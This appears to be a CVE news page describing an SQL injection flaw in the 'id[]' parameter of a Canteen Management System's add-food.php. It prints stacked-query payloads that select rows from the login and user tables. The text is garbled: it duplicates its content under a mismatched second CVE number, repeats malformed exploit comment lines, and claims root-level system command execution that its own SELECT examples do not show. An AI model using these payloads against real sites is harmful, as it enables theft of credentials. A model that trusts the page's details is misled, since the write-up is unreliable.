CVE-2022-43049 The Canteen Management System Project v1.0 had a SQL injection vulnerability.

CVE-2022-43049 The Canteen Management System Project v1.0 had a SQL injection vulnerability.

This issue allows attackers to execute SQL commands with root privileges. In the example below, an SQL injection vulnerability is detected in the /youthappam/add-food.php website when it accepts the input 'id[]' with a value of ';select * from `login` where `id[]`=1'. This input could be exploited to execute system commands with root privileges: 1. -------------------------- Add Food -------------------------- > Select * from `login` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=;select * from `login` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=1;select * from `login` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food

CVE-2023-43050

This issue allows attackers to execute SQL commands with root privileges. In the example below, an SQL injection vulnerability is detected in the /youthappam/add-food.php website when it accepts the input 'id[]' with a value of ';select * from `user` where `id[]`=1'. This input could be exploited to execute system commands with root privileges: 1. -------------------------- Add Food -------------------------- > Select * from `user` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=;select * from `user` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food > id[]=1;select * from `user` where `id[]`=1; -- SQL INjection Exploit -- -- Description: Type: Add Food

SQL Injection

SQL Injection is a type of injection attack where an attacker uses SQL to inject malicious commands into a website's SQL database. The most common way for this is through the use of user input, which is then sent to the database as part of a query. This allows attackers to access sensitive information stored within the database such as usernames and passwords.

References

Subscribe to CVE.news
Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
jamie@example.com
Subscribe